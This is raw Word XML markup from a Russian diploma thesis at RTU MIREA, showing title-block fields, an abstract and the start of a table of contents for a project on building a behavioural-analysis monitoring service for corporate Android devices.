                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                </w:rPr>
                                <w:t>Лит</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00333A82">
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                                <w:t>ера</w:t>
                              </w:r>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="851" w:type="dxa"/>
                              <w:tcBorders>
                                <w:top w:val="nil"/>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w:t>
                              </w:r>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="990" w:type="dxa"/>
                              <w:tcBorders>
                                <w:top w:val="nil"/>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rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00333A82">
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                </w:rPr>
                                <w:t>Листов</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Руководит.</w:t>
                              </w:r>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="1304" w:type="dxa"/>
                              <w:tcBorders>
                                <w:left w:val="nil"/>
                                <w:right w:val="nil"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF" w:rsidP="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left w:val="nil"/>
                                <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF">
                              <w:pPr>
                                <w:pStyle w:val="aff8"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="284" w:type="dxa"/>
                              <w:tcBorders>
                                <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF" w:rsidP="00F870DF">
                              <w:pPr>
                                <w:pStyle w:val="aff8"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="284" w:type="dxa"/>
                              <w:tcBorders>
                                <w:bottom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851" w:type="dxa"/>
                              <w:tcBorders>
                                <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF">
                              <w:pPr>
                                <w:pStyle w:val="aff8"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="990" w:type="dxa"/>
                              <w:tcBorders>
                                <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                <w:bottom w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                <w:right w:val="nil"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF">
                              <w:pPr>
                                <w:pStyle w:val="aff8"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                              </w:pP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lang w:val="ru-RU"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00333A82">
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                                <w:t>Консульт.</w:t>
                              </w:r>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="1304" w:type="dxa"/>
                              <w:tcBorders>
                                <w:left w:val="nil"/>
                                <w:right w:val="nil"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00F870DF" w:rsidRDefault="00F870DF">
                              <w:pPr>
                                <w:pStyle w:val="aff8"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                                <w:t>Потерпеев Г.Ю.</w:t>
                              </w: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val="restart"/>
                              <w:tcBorders>
                                <w:top w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                                <w:left w:val="nil"/>
                                <w:right w:val="nil"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF">
                              <w:pPr>
                                <w:pStyle w:val="aff8"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                                <w:t>РТУ МИРЭА</w:t>
                              </w:r>
                            </w:p>
                          </w:tc>
                        </w:tr>
                        <w:tr w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidTr="00F870DF">
                          <w:trPr>
                            <w:cantSplit/>
                            <w:trHeight w:hRule="exact" w:val="284"/>
                          </w:trPr>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="964" w:type="dxa"/>
                              <w:gridSpan w:val="2"/>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r w:rsidRPr="00333A82">
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                </w:rPr>
                                <w:t>Н. Контр.</w:t>
                              </w:r>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="1304" w:type="dxa"/>
                              <w:tcBorders>
                                <w:left w:val="nil"/>
                                <w:right w:val="nil"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00D62566" w:rsidRDefault="00F870DF">
                              <w:pPr>
                                <w:pStyle w:val="aff8"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="16"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="851" w:type="dxa"/>
                              <w:tcBorders>
                                <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>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right w:val="nil"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF">
                              <w:pPr>
                                <w:pStyle w:val="aff8"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                          </w:tc>
                        </w:tr>
                        <w:tr w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidTr="00F870DF">
                          <w:trPr>
                            <w:cantSplit/>
                            <w:trHeight w:hRule="exact" w:val="284"/>
                          </w:trPr>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="964" w:type="dxa"/>
                              <w:gridSpan w:val="2"/>
                              <w:tcBorders>
                                <w:left w:val="nil"/>
                                <w:bottom w:val="nil"/>
                                <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00DA519E" w:rsidRDefault="00F870DF" w:rsidP="00F870DF">
                              <w:pPr>
                                <w:pStyle w:val="aff8"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="16"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="16"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                                <w:t>З</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00DA519E">
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="16"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                                <w:t xml:space="preserve">ав. </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="16"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                                <w:t>к</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00DA519E">
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="16"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                                <w:t>аф.</w:t>
                              </w:r>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="1304" w:type="dxa"/>
                              <w:tcBorders>
                                <w:left w:val="nil"/>
                                <w:bottom w:val="nil"/>
                                <w:right w:val="nil"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF">
                              <w:pPr>
                                <w:pStyle w:val="aff8"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                  <w:lang w:val="ru-RU"/>
                                </w:rPr>
                                <w:t>Трубиенко О.В.</w:t>
                              </w:r>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="851" w:type="dxa"/>
                              <w:tcBorders>
                                <w:left w:val="single" w:sz="18" w:space="0" w:color="auto"/>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567" w:type="dxa"/>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3969" w:type="dxa"/>
                              <w:vMerge/>
                              <w:tcBorders>
                                <w:left w:val="nil"/>
                                <w:bottom w:val="nil"/>
                                <w:right w:val="single" w:sz="18" w:space="0" w:color="auto"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF">
                              <w:pPr>
                                <w:pStyle w:val="aff8"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                          </w:tc>
                          <w:tc>
                            <w:tcPr>
                              <w:tcW w:w="2835" w:type="dxa"/>
                              <w:gridSpan w:val="5"/>
                              <w:vMerge/>
                              <w:tcBorders>
                                <w:left w:val="nil"/>
                                <w:bottom w:val="nil"/>
                                <w:right w:val="nil"/>
                              </w:tcBorders>
                              <w:vAlign w:val="center"/>
                            </w:tcPr>
                            <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF">
                              <w:pPr>
                                <w:pStyle w:val="aff8"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                  <w:i w:val="0"/>
                                  <w:sz w:val="17"/>
                                  <w:szCs w:val="17"/>
                                </w:rPr>
                              </w:pPr>
                            </w:p>
                          </w:tc>
                        </w:tr>
                      </w:tbl>
                      <w:p w:rsidR="00F870DF" w:rsidRPr="00333A82" w:rsidRDefault="00F870DF" w:rsidP="00F870DF">
                        <w:pPr>
                          <w:rPr>
                            <w:sz w:val="17"/>
                            <w:szCs w:val="17"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:line id="Line 6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6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Line 6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" strokeweight="2.25pt"/>
                <v:line id="Line 6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Line 6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w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>Аннотация</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00F870DF" w:rsidRDefault="00F870DF" w:rsidP="00077414">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Дипломная работа на тему: «</w:t>
      </w:r>
      <w:r w:rsidR="00F66289" w:rsidRPr="00F66289">
        <w:t>Разработка сервиса поведенческого анализа функционирования мобильных устройств на операционных системах андроид</w:t>
      </w:r>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F870DF" w:rsidRDefault="00F870DF" w:rsidP="00077414">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Работа включает: </w:t>
      </w:r>
      <w:r w:rsidR="00F66289">
        <w:t xml:space="preserve">99 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">страниц, </w:t>
      </w:r>
      <w:r w:rsidR="00F66289">
        <w:t xml:space="preserve">16 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">рисунков, </w:t>
      </w:r>
      <w:r w:rsidR="00F66289">
        <w:t xml:space="preserve">20 </w:t>
      </w:r>
      <w:r>
        <w:t>таблиц,</w:t>
      </w:r>
      <w:r w:rsidR="00F66289">
        <w:t xml:space="preserve"> 13 приложений; использованных источников – 19.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F870DF" w:rsidRDefault="00F870DF" w:rsidP="00077414">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ключевые слова: </w:t>
      </w:r>
      <w:r w:rsidR="00077414">
        <w:t>поведенческий анализ, безопасность мобильных устройств, андроид, мониторинг защищенности</w:t>
      </w:r>
      <w:r w:rsidR="00A63AD6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F870DF" w:rsidRDefault="00F870DF" w:rsidP="00077414">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Объект исследования – </w:t>
      </w:r>
      <w:r w:rsidR="00077414">
        <w:t>ОС компонентов мобильного сегмента ИТКС</w:t>
      </w:r>
      <w:r w:rsidR="00A63AD6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F870DF" w:rsidRDefault="00F870DF" w:rsidP="00077414">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Предмет исследования – </w:t>
      </w:r>
      <w:r w:rsidR="00A63AD6">
        <w:t>способы и методы контроля и поведенческого анализа мобильных персональных устройств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F870DF" w:rsidRDefault="00F870DF" w:rsidP="00077414">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Цель работы – </w:t>
      </w:r>
      <w:r w:rsidR="00A63AD6">
        <w:t>разработать и реализовать программное решение для реализации мониторинга устройств на операционной системе андроид.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F870DF" w:rsidRDefault="00F870DF" w:rsidP="00077414">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>По результатам исследо</w:t>
      </w:r>
      <w:r w:rsidR="00A63AD6">
        <w:t>вания предложен и разработан собственный сервис поведенческого анализа функционирования мобильных устройств на операционной системе андроид.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F870DF" w:rsidRDefault="00F870DF" w:rsidP="00077414">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:sectPr w:rsidR="00F870DF" w:rsidSect="00F870DF">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="567" w:bottom="1134" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType w:start="3"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="381"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t>Полученный</w:t>
      </w:r>
      <w:r w:rsidR="00A63AD6">
        <w:t xml:space="preserve"> результат позволит контролировать и предупреждать действия пользователей корпоративных мобильных устройств, направленные на нарушение целостности и конфиденциальности корпоративной информации</w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="00A63AD6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="6" w:name="_Toc61338233" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="7" w:name="_Toc61338308" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="8" w:name="_Toc61505517" w:displacedByCustomXml="next"/>
    <w:bookmarkStart w:id="9" w:name="_Toc61471663" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:id w:val="-1031572505"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:bookmarkEnd w:id="7" w:displacedByCustomXml="prev"/>
        <w:bookmarkEnd w:id="6" w:displacedByCustomXml="prev"/>
        <w:p w:rsidR="00007DA5" w:rsidRDefault="00753BE3" w:rsidP="00753BE3">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="0"/>
            </w:numPr>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00124ABE">
            <w:t>СОДЕРЖАНИЕ</w:t>
          </w:r>
          <w:bookmarkEnd w:id="9"/>
          <w:bookmarkEnd w:id="8"/>
          <w:r w:rsidR="0016468A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="0016468A">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidR="0016468A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>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17" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>СОДЕРЖАНИЕ</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505517 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</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18" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ТЕРМИНЫ И ОПРЕДЕЛЕНИЯ</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505518 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</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19" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ПЕРЕЧЕНЬ СОКРАЩЕНИЕ И УСЛОВНЫХ ОБОЗНАЧЕНИЙ</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505519 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</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20" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ВВЕДЕНИЕ</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505520 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00007DA5" w:rsidRDefault="00F870DF">
          <w:pPr>
            <w:pStyle w:val="15"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="560"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9344"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc61505521" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ИССЛЕДОВАТЕЛЬСКИЙ РАЗДЕЛ</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505521 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</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22" w:history="1">
